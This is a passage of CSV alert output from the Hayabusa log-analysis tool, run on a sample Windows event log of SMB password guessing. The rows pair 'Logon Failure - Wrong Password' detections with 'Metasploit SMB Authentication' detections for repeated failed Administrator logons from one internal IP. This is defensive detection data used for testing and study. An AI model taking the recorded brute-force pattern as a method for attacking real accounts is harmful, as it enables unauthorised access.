Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 